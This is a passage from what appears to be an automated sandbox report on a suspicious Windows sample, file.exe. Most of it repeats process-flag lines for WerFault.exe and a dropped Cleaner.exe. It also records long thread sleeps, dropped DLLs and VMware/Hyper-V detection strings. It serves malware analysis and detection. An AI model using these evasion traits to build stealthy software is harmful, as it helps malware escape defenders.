Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep count: 119 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep time: -71400s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4692 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: Amcache.hve.30.dr Binary or memory string: VMware
Source: Amcache.hve.30.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.30.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual USB Mouse
Source: Cleaner.exe, 00000021.00000002.658091156.0000024B7E02C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.30.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.30.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr Binary or memory string: VMware7,1
Source: Amcache.hve.30.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000000.306966127.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.30.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.30.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
